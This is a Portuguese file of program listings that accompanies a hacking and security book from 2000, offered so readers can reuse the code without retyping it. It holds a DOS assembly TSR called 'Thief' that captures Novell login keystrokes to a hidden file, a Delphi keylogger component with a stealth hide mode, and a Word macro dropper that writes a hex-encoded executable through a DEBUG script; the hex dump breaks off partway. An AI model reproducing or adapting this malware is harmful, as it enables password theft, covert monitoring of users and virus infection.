Tecnicas Para Hackers - Wilson Oliveira

Programas do livro: TÉCNICAS PARA HACKERS – SOLUÇÕES PARA SEGURANÇA 1

Ao Leitor:

Conforme explicado no livro, este ficheiro contém os Programas (com duas ou mais páginas) para que os possa utilizar sem ter que os re-escrever. Este ficheiro é enviado por e-mail bem como actualizações futuras ao mesmo e outras informações relativas ao assunto do livro, privilegiando, desse modo, os leitores ‘registados’. Esperamos prestar desse modo o melhor serviço aos nossos leitores. Qualquer sugestão ou pedido de esclarecimento podem ser dirigidos a [email protected]

Versão 1.0 de 31/Jul/2000

2 CENTRO ATLÂNTICO – COLECÇÃO TECNOLOGIAS

Página 67 ; ; Thief - Capturador de palavras-chave Novell ; Copyright (c) - Washington High School ; ; Thief v.1.0 ; cseg segment assume cs:cseg,ds:cseg org 100h public oi21,ac,ob,fn,fh,flag,ni21,jtov,oc,lethro,wpwtf,exist,create, public cntr,lits,begin .RADIX 16 start: push cs push cs push cs pop ds pop es mov ax,0fffé CLI pop ss mov sp,ax STI jmp begin oi21 dd ? ac dw 0 ob dw 80h dup (?) buff2 db 80h dup (?) fn db 'c:\testing',0FF,'.tmp',0 search1 db 'LOGIN' foundf db 0 fh dw 0 flag db 0 cntr dw 0 ni21: assume cs:cseg,ds:nothing,es:nothing cmp ax,4b00h je exec cmp foundf,0ffh jne nc cmp ah,8 je oc cmp ah,7 je oc nc: push ax mov al,cs:flag not al cmp al,0 jne jtov mov ax,cntr inc ax mov cntr,ax cmp ax,31h jb jtov xor ax,ax mov cntr,ax mov flag,al pop ax pushf


call dword ptr [oi21] push ds push cs pop ds push ax push bx push cx push dx jmp short wpwtf jtov: pop ax jmp dword ptr cs:[oi21] exec: call scanfor jmp nc oc: pushf call dword ptr cs:[oi21] assume ds:cseg push ds push cs pop ds push ax push bx push cx push dx mov bx,ac mov [bx],al inc bx mov [ac],bx cmp al,0dh jne lethro mov byte ptr [bx],0ah not cs:[flag] lethro: pop dx pop cx pop bx pop ax pop ds iret scanfor: push ax push di push si push es push ds push cs push cs pop es mov si,dx mov di,offset buff2 moveit: lodsb and al,0dfh stosb or al,al jnz moveit pop ds mov di,offset buff2 look: push di mov si,offset search1 mov cx,5 repe cmpsb


pop di or cx,cx jz foundit inc di cmp byte ptr [di+5],0 je not_found jmp look not_found: xor ax,ax mov foundf,al jmp short endofsearch foundit: mov ax,0ffh mov foundf,al endofsearch: pop ds pop es pop si pop di pop ax ret wpwtf: mov ax,3d02h mov dx,offset fn pushf call dword ptr [oi21] jnc exist cmp al,2 je create jmp lethro create: mov ah,3ch mov dx,offset fn mov cx,02h+04h pushf call dword ptr [oi21] jnc exist jmp lethro exist: mov fh,ax mov bx,ax mov ax,4202h xor cx,cx xor dx,dx pushf call dword ptr[oi21] mov cx,[ac] mov dx,offset ob sub cx,dx mov [ac],dx inc cx mov bx,fh mov ah,40h pushf call dword ptr [oi21] mov ah,3é mov bx,fh pushf call dword ptr [oi21] jmp lethro lits db 90h begin: mov ax,offset ob mov [ac],ax


mov ax,3521h int 21h mov di,offset oi21 mov [di],bx mov [di+2],es mov dx,offset ni21 push cs pop ds mov ax,2521h int 21h mov dx,offset lits int 27h cseg ends end start


Página 72 unit Main; interface uses SysUtils, WinTypes, WinProcs, Classes, Controls, Forms, StdCtrls, ShellAPI, Keyspy, ExtCtrls; type TForm1 = class(TForm) KeySpy: TKeySpy; Label1: TLabel; Label3: TLabel; GroupBox1: TGroupBox; GroupBox2: TGroupBox; Hook: TMemo; Label4: TLabel; Label2: TLabel; Image1: TImage; Panel1: TPanel; GroupBox3: TGroupBox; OnDown: TLabel; OnUp: TLabel; GroupBox4: TGroupBox; ActiveLayout: TLabel; GroupBox5: TGroupBox; Label5: TLabel; procedure Label1Click(Sender: TObject); procedure KeySpyKeySpyDown(Sender: TObject; Key: Byte; KeyStr: String); procedure KeySpyKeySpyUp(Sender: TObject; Key: Byte; KeyStr: String); procedure KeySpyKeyword(Sender: TObject); procedure KeySpyLayoutChanged(Sender: TObject; Layout: string); procedure KeySpyActiveTitleChanged(Sender: TObject; ActiveTitle: String); procedure FormCloseQuery(Sender: TObject; var CanClose: Boolean); procedure HookChange(Sender: TObject); private public end; var Form1: TForm1; implementation {$R *.DFM} const OldRet: Boolean = False; procedure TForm1.Label1Click(Sender: TObject); begin ShellExecute(GetDesktopWindow, 'open', 'mailto:[email protected]', nil, nil, sw_ShowNormal); end; procedure TForm1.KeySpyKeySpyDown(Sender: TObject; Key: Byte; KeyStr: String); begin OnDown.Caption:= 'OnKeySpyDown: Key = ' + IntToStr(Key) + ', KeyStr = ' + KeyStr; if (KeyStr[1] = '-') and (KeyStr[2] = '-') then begin Hook.Lines.Add('');


OldRet:= True; end else if OldRet then begin Hook.Lines.Add(''); OldRet:= False; end; Hook.Text:= Hook.Text + KeyStr; { For 16-bit only} {$IFNDEF WIN32} if (Length(Hook.Text) > $F0) then Hook.Clear; {$ENDIF} end; procedure TForm1.KeySpyKeySpyUp(Sender: TObject; Key: Byte; KeyStr: String); begin OnUp.Caption:= 'OnKeySpyUp: Key = ' + IntToStr(Key) + ', KeyStr = ' + KeyStr; end; procedure TForm1.KeySpyKeyword(Sender: TObject); begin if Visible then Application.MessageBox('Type ''keyword'' to restore window.', 'Hiding...', mb_Ok or mb_IconInformation); Visible:= not Visible; if Visible then ShowWindow(Application.Handle, sw_Show) else ShowWindow(Application.Handle, sw_Hide); end; procedure TForm1.KeySpyLayoutChanged(Sender: TObject; Layout: string); begin if Layout = '00000419' then begin Layout:= Layout + ' (Russian)'; KeySpy.SpyLayout:= klRussian; end else if Layout = '00000410' then begin Layout:= Layout + ' (Italian (standard))'; KeySpy.SpyLayout:= klItalian; end else begin KeySpy.SpyLayout:= klAmerican; if Layout = '00000409' then Layout:= Layout + ' (US English)' else if Layout = '00000422' then Layout:= Layout + ' (Ukrainian)' else if Layout = '00000423' then Layout:= Layout + ' (Belorusian)' else if Layout = '0000040C' then Layout:= Layout + ' (French (standard))' else if Layout = '00000407' then Layout:= Layout + ' (German (standard))' else if Layout = '00000C0A' then Layout:= Layout + ' (Spanish (standard))'; end; ActiveLayout.Caption:= Layout; end; procedure TForm1.KeySpyActiveTitleChanged(Sender: TObject; ActiveTitle: String); begin Label5.Caption:= ActiveTitle; OldRet:= True; Hook.Text:= Hook.Text + #13#10'[' + ActiveTitle + ']'; { For 16-bit only}


{$IFNDEF WIN32} if (Length(Hook.Text) > $F0) then Hook.Clear; {$ENDIF} end; procedure TForm1.FormCloseQuery(Sender: TObject; var CanClose: Boolean); begin {} CanClose:= True; end; end.


Página 75 unit KeySpy; interface uses {$IFDEF WIN32} Windows, {$ELSE} WinTypes, WinProcs,{$ENDIF} SysUtils, Controls, Classes, Messages, Forms; type TSpyLayout = (klAmerican, klItalian, klRussian, klPortuguese); TOnKeySpy = procedure(Sender: TObject; Key: Byte; KeyStr: String) of object; {$IFDEF Win32} TOnLayoutChanged = procedure(Sender: TObject; Layout: String) of object; {$ENDIF} TOnActiveWindowChanged = procedure(Sender: TObject; ActiveTitle: String) of object; TKeySpy = class(TComponent) private {$IFDEF Win32} CurrentLayout: String; FActiveLayout: String; {$ENDIF} CurrentActiveWindowTitle: String; FActiveWindowTitle: String; FSpyLayout: TSpyLayout; FWindowHandle: HWnd; FOnKeySpyDown, FOnKeySpyUp: TOnKeySpy; FOnKeyword: TNotifyEvent; {$IFDEF Win32} FOnLayoutChanged: TOnLayoutChanged; {$ENDIF} FOnActiveWindowChanged: TOnActiveWindowChanged; FEnabled: Boolean; FKeyword, KeyComp: String; OldKey: Byte; LShiftUp, RShiftUp: Boolean; procedure UpdateTimer; procedure SetEnabled(Value: Boolean); procedure SetKeyword(Value: String); procedure WndProc(var Msg: TMessage); procedure SetNothingStr(Value: String); protected procedure KeySpy; dynamic; public constructor Create(AOwner: TComponent); override; destructor Destroy; override; published property ActiveWindowTitle: String read FActiveWindowTitle write SetNothingStr; property Enabled: Boolean read FEnabled write SetEnabled; property Keyword: String read FKeyword write SetKeyword; property SpyLayout: TSpyLayout read FSpyLayout write FSpyLayout; {$IFDEF Win32} property ActiveLayout: String read FActiveLayout write FActiveLayout; {$ENDIF} property OnKeySpyDown: TOnKeySpy read FOnKeySpyDown write FOnKeySpyDown; property OnKeySpyUp: TOnKeySpy read FOnKeySpyUp write FOnKeySpyUp; property OnKeyword: TNotifyEvent read FOnKeyword write FOnKeyword; {$IFDEF Win32} property OnLayoutChanged: TOnLayoutChanged read FOnLayoutChanged write FOnLayoutChanged;


{$ENDIF} property OnActiveTitleChanged: TOnActiveWindowChanged read FOnActiveWindowChanged write FOnActiveWindowChanged; end; procedure Register; implementation {$I KLayouts.inc} constructor TKeySpy.Create(AOwner: TComponent); begin inherited Create(AOwner); LShiftUp:= True; RShiftUp:= True; FEnabled:= True; FWindowHandle:= AllocateHWnd(WndProc); if FEnabled then UpdateTimer; end; destructor TKeySpy.Destroy; begin FEnabled:= False; UpdateTimer; DeallocateHWnd(FWindowHandle); inherited Destroy; end; procedure TKeySpy.WndProc(var Msg: TMessage); begin with Msg do if Msg = WM_TIMER then try KeySpy; except Application.HandleException(Self); end else Result:= DefWindowProc(FWindowHandle, Msg, wParam, lParam); end; procedure TKeySpy.UpdateTimer; var b: Byte; begin KillTimer(FWindowHandle, 1); if FEnabled then begin asm mov al, 60h mov b, al end; OldKey:= b; if SetTimer(FWindowHandle, 1, 1, nil) = 0 then raise EOutOfResources.Create('No timers'); end; end; procedure TKeySpy.SetEnabled(Value: Boolean); begin if Value <> FEnabled then begin FEnabled:= Value; UpdateTimer;


end; end; procedure TKeySpy.SetKeyword(Value: String); begin Value:= LowerCase(Value); if Value <> FKeyword then FKeyword:= Value; end; procedure TKeySpy.KeySpy; var PC: Array[0..$FFF] of Char; Key: Byte; St: String; Wnd: hWnd; begin {$IFDEF Win32} Wnd:= GetForegroundWindow; {$ELSE} Wnd:= GetActiveWindow; {$ENDIF} SendMessage(Wnd, wm_GetText, $FFF, LongInt(@PC)); FActiveWindowTitle:= StrPas(PC); if CurrentActiveWindowTitle <> FActiveWindowTitle then begin CurrentActiveWindowTitle:= FActiveWindowTitle; if Assigned(FOnActiveWindowChanged) then FOnActiveWindowChanged(Self, FActiveWindowTitle); end; {$IFDEF Win32} GetKeyboardLayoutName(PC); FActiveLayout:= StrPas(PC); if (FActiveLayout <> CurrentLayout) then begin CurrentLayout:= FActiveLayout; if Assigned(FOnLayoutChanged) then FOnLayoutChanged(Self, FActiveLayout); end; {$ENDIF} asm in al, 60h mov Key, al end; if Key = 170 then begin Key:= 84; LShiftUp:= True; end; if Key = 182 then begin Key:= 85; RShiftUp:= True; end; if Key = 42 then LShiftUp:= False; if Key = 54 then RShiftUp:= False; if Key <> OldKey then begin OldKey:= Key; if Key <= 88 then begin case FSpyLayout of klAmerican: if LShiftUp and RShiftUp then


St:= StrPas(LowButtonName[Key]) else St:= StrPas(HiButtonName[Key]); klItalian: if LShiftUp and RShiftUp then St:= StrPas(ItalianLowButtonName[Key]) else St:= StrPas(ItalianHiButtonName[Key]); klRussian: if LShiftUp and RShiftUp then St:= StrPas(RussianLowButtonName[Key]) else St:= StrPas(RussianHiButtonName[Key]); klPortuguese: if LShiftUp and RShiftUp then St:= StrPas(PortugueseLowButtonName[Key]) else St:= StrPas(PortugueseHiButtonName[Key]); end; if Assigned(FOnKeySpyDown) then FOnKeySpyDown(Self, Key, St); if Assigned(FOnKeyword) then begin KeyComp:= KeyComp + St; if Length(KeyComp) > Length(FKeyword) then begin Move(KeyComp[Length(St) + 1], KeyComp[1], Length(KeyComp)); {$IFDEF WIN32} SetLength(KeyComp, Length(FKeyword)); {$ELSE} KeyComp[0]:= char(Length(FKeyword)); {$ENDIF} end; if LowerCase(KeyComp) = FKeyword then FOnKeyword(Self); end; end else if Key - 128 <= 88 then begin case FSpyLayout of klAmerican: if LShiftUp and RShiftUp then St:= StrPas(LowButtonName[Key - 128]) else St:= StrPas(HiButtonName[Key - 128]); klItalian: if LShiftUp and RShiftUp then St:= StrPas(ItalianLowButtonName[Key - 128]) else St:= StrPas(ItalianHiButtonName[Key - 128]); klRussian: if LShiftUp and RShiftUp then St:= StrPas(RussianLowButtonName[Key - 128]) else St:= StrPas(RussianHiButtonName[Key - 128]); klPortuguese: if LShiftUp and RShiftUp then St:= StrPas(PortugueseLowButtonName[Key]) else St:= StrPas(PortugueseHiButtonName[Key]); end; if Assigned(FOnKeySpyUp) then FOnKeySpyUp(Self, Key, St) end; end; end; procedure TKeySpy.SetNothingStr(Value: String); begin {} end; procedure Register;


begin RegisterComponents('UtilMind', [TKeySpy]); end; end.


Página 117 Sub MAIN caminho$ = Ambiente$("LEGADO") If caminho$ = "NOWAY" Then Goto NoDropper If Hora(Agora()) < 5 + 12 Then Goto NoDropper End If Open "C:\legado.SCR" For Output As #1 'Joga o script Print #1, "N c:\legado.com" Print #1, "E0100 4D 5A 60 00 10 00 70 00 1E 00 E0 02 E0 02 58 02" Print #1, "E0110 00 25 00 00 54 08 00 00 1C 00 00 00 2D 00 00 00" Print #1, "E0120 3C 00 00 00 4C 00 00 00 5E 00 00 00 8D 00 00 00" Print #1, "E0130 E6 00 00 00 F5 00 00 00 04 01 00 00 13 01 00 00" Print #1, "E0140 26 01 00 00 31 01 00 00 6B 01 00 00 79 01 00 00" Print #1, "E0150 93 01 00 00 BB 01 00 00 22 02 00 00 37 02 00 00" Print #1, "E0160 56 02 00 00 64 02 00 00 73 02 00 00 81 02 00 00" Print #1, "E0170 9B 02 00 00 B5 02 00 00 D0 02 00 00 DA 02 00 00" Print #1, "E0180 E9 02 00 00 F7 02 00 00 07 03 00 00 15 03 00 00" Print #1, "E0190 2F 03 00 00 49 03 00 00 53 03 00 00 5D 03 00 00" Print #1, "E01A0 6C 03 00 00 7A 03 00 00 8A 03 00 00 98 03 00 00" Print #1, "E01B0 A9 03 00 00 C3 03 00 00 DD 03 00 00 F8 03 00 00" Print #1, "E01C0 02 04 00 00 0C 04 00 00 5C 04 00 00 84 04 00 00" Print #1, "E01D0 8E 04 00 00 B2 04 00 00 BC 04 00 00 CE 04 00 00" Print #1, "E01E0 FA 04 00 00 08 05 00 00 19 05 00 00 29 05 00 00" Print #1, "E01F0 38 05 00 00 52 05 00 00 6D 05 00 00 88 05 00 00" Print #1, "E0200 93 05 00 00 A7 05 00 00 B1 05 00 00 C0 05 00 00" Print #1, "E0210 C5 05 00 00 CF 05 00 00 DE 05 00 00 E3 05 00 00" Print #1, "E0220 E8 05 00 00 F7 05 00 00 02 06 00 00 0D 06 00 00" Print #1, "E0230 5D 06 00 00 99 06 00 00 A4 06 00 00 B4 06 00 00" Print #1, "E0240 BF 06 00 00 CF 06 00 00 DA 06 00 00 FF 06 00 00" Print #1, "E0250 0F 07 00 00 1E 07 00 00 5C 07 00 00 6F 07 00 00" Print #1, "E0260 74 07 00 00 83 07 00 00 96 07 00 00 A0 07 00 00" Print #1, "E0270 B1 07 00 00 BB 07 00 00 D0 07 00 00 DA 07 00 00" Print #1, "E0280 EB 07 00 00 F5 07 00 00 57 08 00 00 5C 08 00 00" Print #1, "E0290 73 08 00 00 7D 08 00 00 86 08 00 00 94 08 00 00" Print #1, "E02A0 A2 08 00 00 AA 08 00 00 C0 08 00 00 BE 02 8D 00" Print #1, "E02B0 09 00 BF 00 24 00 BF 00 37 00 BF 00 3B 01 BF 00" Print #1, "E02C0 01 00 21 01 1B 01 21 01 B5 02 21 01 45 09 21 01" Print #1, "E02D0 60 09 21 01 76 09 21 01 95 09 21 01 00 00 00 00" Print #1, "E02E0 55 89 E5 81 EC 80 01 8C D3 8E C3 8C DB FC 8D BE" Print #1, "E02F0 00 FF C5 76 06 AC AA 91 30 ED F3 A4 8E DB 8D BE" Print #1, "E0300 80 FE 16 57 8D BE 00 FF 16 57 9A 3F 04 21 01 8D" Print #1, "E0310 BE 80 FE 16 57 B8 80 00 50 9A 7A 04 21 01 8D BE" Print #1, "E0320 80 FE 16 57 BF 72 06 1E 57 9A 93 00 8D 00 FF 36" Print #1, "E0330 74 06 FF 36 72 06 BF 66 06 1E 57 9A 55 01 8D 00" Print #1, "E0340 A1 6C 06 A3 58 06 A1 6E 06 A3 5A 06 A1 70 06 A3" Print #1, "E0350 5C 06 A1 6A 06 A3 60 06 A1 68 06 A3 62 06 A1 66" Print #1, "E0360 06 A3 64 06 8D BE 80 FE 16 57 9A FB 04 21 01 89" Print #1, "E0370 EC 5D CA 04 00 55 89 E5 81 EC 80 01 8C D3 8E C3" Print #1, "E0380 8C DB FC 8D BE 00 FF C5 76 06 AC AA 91 30 ED F3" Print #1, "E0390 A4 8E DB A1 58 06 A3 6C 06 A1 5A 06 A3 6E 06 A1" Print #1, "E03A0 5C 06 A3 70 06 A1 60 06 A3 6A 06 A1 62 06 A3 68" Print #1, "E03B0 06 A1 64 06 A3 66 06 8D BE 80 FE 16 57 8D BE 00" Print #1, "E03C0 FF 16 57 9A 3F 04 21 01 8D BE 80 FE 16 57 B8 80" Print #1, "E03D0 00 50 9A 7A 04 21 01 BF 66 06 1E 57 BF 72 06 1E" Print #1, "E03E0 57 9A 99 01 8D 00 8D BE 80 FE 16 57 B8 80 00 50" Print #1, "E03F0 9A 7A 04 21 01 8D BE 80 FE 16 57 FF 36 74 06 FF" Print #1, "E0400 36 72 06 9A BA 00 8D 00 8D BE 80 FE 16 57 9A FB" Print #1, "E0410 04 21 01 89 EC 5D CA 04 00 55 89 E5 81 EC 10 01" Print #1, "E0420 8C D3 8E C3 8C DB FC 8D BE FE FE C5 76 06 AC AA" Print #1, "E0430 91 30 ED F3 A4 8E DB C7 86 F0 FE 01 00 BF D6 00" Print #1, "E0440 1E 57 8D BE FE FE 16 57 9A 3F 04 21 01 BF D6 00" Print #1, "E0450 1E 57 B8 01 00 50 9A 7A 04 21 01 BF D6 00 1E 57" Print #1, "E0460 8D BE F4 FE 16 57 B8 0A 00 50 8D BE F2 FE 16 57" Print #1, "E0470 9A 65 05 21 01 8A 86 F6 FE 3A 06 05 00 75 10 8A" Print #1, "E0480 86 F7 FE 3A 06 06 00 75 06 C6 46 FF 01 EB 04 C6" Print #1, "E0490 46 FF 00 BF D6 00 1E 57 9A FB 04 21 01 8A 46 FF" Print #1, "E04A0 89 EC 5D CA 04 00 0B 56 49 52 54 45 4D 50 2E 54" Print #1, "E04B0 4D 50 0B 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 0B 76" Print #1, "E04C0 69 72 74 65 6D 70 2E 74 6D 70 0B 76 69 72 74 65"


Print #1, "E04D0 6D 70 2E 54 4D 50 55 89 E5 81 EC 64 27 8C D3 8E" Print #1, "E04E0 C3 8C DB FC 8D BE 00 FF C5 76 06 AC AA 91 30 ED" Print #1, "E04F0 F3 A4 8E DB 8D BE 00 FF 16 57 BF C6 01 0E 57 9A" Print #1, "E0500 EA 07 21 01 75 03 E9 EF 01 8D BE 00 FF 16 57 BF" Print #1, "E0510 D2 01 0E 57 9A EA 07 21 01 75 03 E9 DA 01 8D BE" Print #1, "E0520 00 FF 16 57 0E E8 B8 FD BF 56 01 1E 57 8D BE 00" Print #1, "E0530 FF 16 57 9A 3F 04 21 01 BF 56 01 1E 57 B8 01 00" Print #1, "E0540 50 9A 7A 04 21 01 BF D6 01 1E 57 BF DE 01 0E 57" Print #1, "E0550 9A 3F 04 21 01 BF D6 01 1E 57 B8 01 00 50 9A 83" Print #1, "E0560 04 21 01 BF 56 01 1E 57 8D BE A0 D8 16 57 B8 00" Print #1, "E0570 08 50 8D BE 9E D8 16 57 9A 65 05 21 01 BF D6 01" Print #1, "E0580 1E 57 8D BE A0 D8 16 57 FF B6 9E D8 8D BE 9C D8" Print #1, "E0590 16 57 9A 6C 05 21 01 83 BE 9E D8 00 74 0A 8B 86" Print #1, "E05A0 9C D8 3B 86 9E D8 74 BB BF 56 01 1E 57 9A FB 04" Print #1, "E05B0 21 01 BF D6 01 1E 57 9A FB 04 21 01 BF 56 01 1E" Print #1, "E05C0 57 BF 76 06 1E 57 9A 3F 04 21 01 BF 56 01 1E 57" Print #1, "E05D0 B8 01 00 50 9A 7A 04 21 01 BF D6 01 1E 57 8D BE" Print #1, "E05E0 00 FF 16 57 9A 3F 04 21 01 BF D6 01 1E 57 B8 01" Print #1, "E05F0 00 50 9A 83 04 21 01 BF 56 01 1E 57 8D BE A0 E0" Print #1, "E0600 16 57 B8 60 1E 50 8D BE 9E D8 16 57 9A 65 05 21" Print #1, "E0610 01 BF D6 01 1E 57 8D BE A0 E0 16 57 FF B6 9E D8" Print #1, "E0620 8D BE 9C D8 16 57 9A 6C 05 21 01 BF 56 01 1E 57" Print #1, "E0630 9A FB 04 21 01 BF D6 01 1E 57 9A FB 04 21 01 BF" Print #1, "E0640 56 01 1E 57 BF EA 01 0E 57 9A 3F 04 21 01 BF 56" Print #1, "E0650 01 1E 57 B8 01 00 50 9A 7A 04 21 01 BF D6 01 1E" Print #1, "E0660 57 8D BE 00 FF 16 57 9A 3F 04 21 01 BF D6 01 1E" Print #1, "E0670 57 B8 01 00 50 9A 7A 04 21 01 BF D6 01 1E 57 B8" Print #1, "E0680 60 1E 31 D2 52 50 9A CD 05 21 01 BF 56 01 1E 57" Print #1, "E0690 8D BE A0 E0 16 57 B8 60 1E 50 8D BE 9E D8 16 57" Print #1, "E06A0 9A 65 05 21 01 BF D6 01 1E 57 8D BE A0 E0 16 57" Print #1, "E06B0 FF B6 9E D8 8D BE 9C D8 16 57 9A 6C 05 21 01 83" Print #1, "E06C0 BE 9E D8 00 74 0A 8B 86 9C D8 3B 86 9E D8 74 BB" Print #1, "E06D0 BF 56 01 1E 57 9A FB 04 21 01 BF D6 01 1E 57 9A" Print #1, "E06E0 FB 04 21 01 BF 56 01 1E 57 9A FD 05 21 01 8D BE" Print #1, "E06F0 00 FF 16 57 0E E8 7D FC 89 EC 5D CA 04 00 55 89" Print #1, "E0700 E5 81 EC 00 04 8C D3 8E C3 8C DB FC 8D BE 00 FF" Print #1, "E0710 C5 76 0A AC AA 91 30 ED F3 A4 8D BE 00 FE C5 76" Print #1, "E0720 06 AC AA 91 30 ED F3 A4 8E DB 8D BE 00 FF 16 57" Print #1, "E0730 B8 20 00 50 BF C8 06 1E 57 9A D9 00 8D 00 83 3E" Print #1, "E0740 F4 06 00 75 6D 83 3E C6 06 28 7D 66 80 3E E6 06" Print #1, "E0750 00 75 02 EB 5D 8D BE 00 FD 16 57 8D BE 00 FE 16" Print #1, "E0760 57 9A F9 06 21 01 BF E6 06 1E 57 9A 78 07 21 01" Print #1, "E0770 0E E8 A5 FC 08 C0 75 2E FF 06 C6 06 83 3E C6 06" Print #1, "E0780 28 7D 21 8D BE 00 FC 16 57 8D BE 00 FE 16 57 9A" Print #1, "E0790 F9 06 21 01 BF E6 06 1E 57 9A 78 07 21 01 0E E8" Print #1, "E07A0 34 FD EB 02 EB 0C BF C8 06 1E 57 9A 17 01 8D 00" Print #1, "E07B0 EB 8C 89 EC 5D CA 08 00 0B 76 69 72 74 65 6D 70" Print #1, "E07C0 2E 74 6D 70 01 20 55 89 E5 81 EC 04 0C 8D 7E 80" Print #1, "E07D0 16 57 BF 76 06 1E 57 9A 3F 04 21 01 8D 7E 80 16" Print #1, "E07E0 57 B8 01 00 50 9A 7A 04 21 01 8D 7E 80 16 57 B8" Print #1, "E07F0 60 1E 31 D2 52 50 9A CD 05 21 01 8D BE 00 FF 16" Print #1, "E0800 57 BF D8 04 0E 57 9A 3F 04 21 01 8D BE 00 FF 16" Print #1, "E0810 57 B8 01 00 50 9A 83 04 21 01 8D 7E 80 16 57 8D" Print #1, "E0820 BE FC F6 16 57 B8 00 08 50 8D BE FE FE 16 57 9A" Print #1, "E0830 65 05 21 01 8D BE 00 FF 16 57 8D BE FC F6 16 57" Print #1, "E0840 FF B6 FE FE 8D BE FC FE 16 57 9A 6C 05 21 01 83" Print #1, "E0850 BE FE FE 00 74 0A 8B 86 FC FE 3B 86 FE FE 74 BA" Print #1, "E0860 8D 7E 80 16 57 9A FB 04 21 01 8D BE 00 FF 16 57" Print #1, "E0870 9A FB 04 21 01 BF D8 04 0E 57 8D BE FC F5 16 57" Print #1, "E0880 B8 01 00 50 9A 71 06 21 01 BF E4 04 0E 57 9A 78" Print #1, "E0890 07 21 01 8D BE FC F4 16 57 B8 02 00 50 9A 71 06" Print #1, "E08A0 21 01 9A 78 07 21 01 BF E4 04 0E 57 9A 78 07 21" Print #1, "E08B0 01 8D BE FC F3 16 57 B8 03 00 50 9A 71 06 21 01" Print #1, "E08C0 9A 78 07 21 01 9A 3F 02 8D 00 8D BE 00 FF 16 57" Print #1, "E08D0 B8 80 00 50 9A 83 04 21 01 8D BE 00 FF 16 57 9A" Print #1, "E08E0 FB 04 21 01 8D BE 00 FF 16 57 9A FD 05 21 01 89" Print #1, "E08F0 EC 5D CB 0E 63 3A 5C 63 6F 6D 6D 61 6E 64 2E 63" Print #1, "E0900 6F 6D 09 63 3A 5C 69 6F 2E 73 79 73 12 63 3A 5C" Print #1, "E0910 77 69 6E 64 6F 77 73 5C 77 69 6E 2E 63 6F 6D 55" Print #1, "E0920 89 E5 81 EC 8A 00 8D 7E FA 16 57 8D 7E FE 16 57" Print #1, "E0930 8D 7E FC 16 57 8D 7E F8 16 57 9A 00 00 8D 00 C6" Print #1, "E0940 46 F7 00 81 7E FA CE 07 75 10 83 7E FE 07 72 0A" Print #1, "E0950 83 7E FC 0C 72 04 C6 46 F7 01 81 7E FA CE 07 76"


Print #1, "E0960 04 C6 46 F7 01 80 7E F7 00 74 51 8D BE 76 FF 16" Print #1, "E0970 57 BF 13 06 0E 57 9A 3F 04 21 01 8D BE 76 FF 16" Print #1, "E0980 57 9A FD 05 21 01 8D BE 76 FF 16 57 BF 22 06 0E" Print #1, "E0990 57 9A 3F 04 21 01 8D BE 76 FF 16 57 9A FD 05 21" Print #1, "E09A0 01 8D BE 76 FF 16 57 BF 2C 06 0E 57 9A 3F 04 21" Print #1, "E09B0 01 8D BE 76 FF 16 57 9A FD 05 21 01 89 EC 5D CB" Print #1, "E09C0 04 50 41 54 48 06 5C 2A 2E 63 6F 6D 01 5C 06 5C" Print #1, "E09D0 2A 2E 65 78 65 55 89 E5 81 EC 04 04 9A D8 02 8D" Print #1, "E09E0 00 8D BE FE FC 16 57 BF E0 06 0E 57 9A D1 01 8D" Print #1, "E09F0 00 8D BE FE FD 16 57 B8 FF 00 50 9A 13 07 21 01" Print #1, "E0A00 C6 86 FE FE 00 8A 86 FE FD 30 E4 89 86 FC FD B8" Print #1, "E0A10 01 00 3B 86 FC FD 7E 03 E9 D1 00 89 46 FE EB 03" Print #1, "E0A20 FF 46 FE 8B 7E FE 80 BB FE FD 3B 74 3A 8D BE FC" Print #1, "E0A30 FB 16 57 8D BE FE FE 16 57 9A F9 06 21 01 8D BE" Print #1, "E0A40 FC FC 16 57 8B 7E FE 8A 83 FE FD 50 9A 15 08 21" Print #1, "E0A50 01 9A 78 07 21 01 8D BE FE FE 16 57 B8 FF 00 50" Print #1, "E0A60 9A 13 07 21 01 EB 79 8D BE FC FC 16 57 8D BE FE" Print #1, "E0A70 FE 16 57 9A F9 06 21 01 BF E5 06 0E 57 9A 78 07" Print #1, "E0A80 21 01 8D BE FC FB 16 57 8D BE FE FE 16 57 9A F9" Print #1, "E0A90 06 21 01 BF EC 06 0E 57 9A 78 07 21 01 0E E8 5D" Print #1, "E0AA0 FC 8D BE FC FC 16 57 8D BE FE FE 16 57 9A F9 06" Print #1, "E0AB0 21 01 BF EE 06 0E 57 9A 78 07 21 01 8D BE FC FB" Print #1, "E0AC0 16 57 8D BE FE FE 16 57 9A F9 06 21 01 BF EC 06" Print #1, "E0AD0 0E 57 9A 78 07 21 01 0E E8 23 FC C6 86 FE FE 00" Print #1, "E0AE0 8B 46 FE 3B 86 FC FD 74 03 E9 34 FF 89 EC 5D CB" Print #1, "E0AF0 05 2A 2E 63 6F 6D 00 05 2A 2E 65 78 65 55 89 E5" Print #1, "E0B00 31 C0 A3 C6 06 BF 10 08 0E 57 BF 16 08 0E 57 0E" Print #1, "E0B10 E8 EB FB BF 17 08 0E 57 BF 16 08 0E 57 0E E8 DD" Print #1, "E0B20 FB 0E E8 B0 FE 5D CB 06 4C 45 47 41 44 4F 05 4E" Print #1, "E0B30 4F 57 41 59 9A 00 00 21 01 9A 0D 00 BF 00 55 89" Print #1, "E0B40 E5 81 EC 00 01 8D BE 00 FF 16 57 BF 47 08 0E 57" Print #1, "E0B50 9A D1 01 8D 00 BF 4E 08 0E 57 9A EA 07 21 01 75" Print #1, "E0B60 07 31 C0 9A 16 01 21 01 8D BE 00 FF 16 57 31 C0" Print #1, "E0B70 50 9A 71 06 21 01 BF 76 06 1E 57 B8 4F 00 50 9A" Print #1, "E0B80 13 07 21 01 B0 00 50 9A 84 00 8D 00 0E E8 6D FF" Print #1, "E0B90 0E E8 32 FC 0E E8 87 FD 89 EC 5D 31 C0 9A 16 01" Print #1, "E0BA0 21 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E0BB0 55 8B EC B4 2A CD 21 32 E4 C4 7E 06 AB 8A C2 C4" Print #1, "E0BC0 7E 0A AB 8A C6 C4 7E 0E AB 91 C4 7E 12 AB 5D CA" Print #1, "E0BD0 10 00 55 8B EC 8B 4E 0A 8A 76 08 8A 56 06 B4 2B" Print #1, "E0BE0 CD 21 5D CA 06 00 55 8B EC B4 2C CD 21 32 E4 8A" Print #1, "E0BF0 C2 C4 7E 06 AB 8A C6 C4 7E 0A AB 8A C1 C4 7E 0E" Print #1, "E0C00 AB 8A C5 C4 7E 12 AB 5D CA 10 00 55 8B EC 8A 6E" Print #1, "E0C10 0C 8A 4E 0A 8A 76 08 8A 56 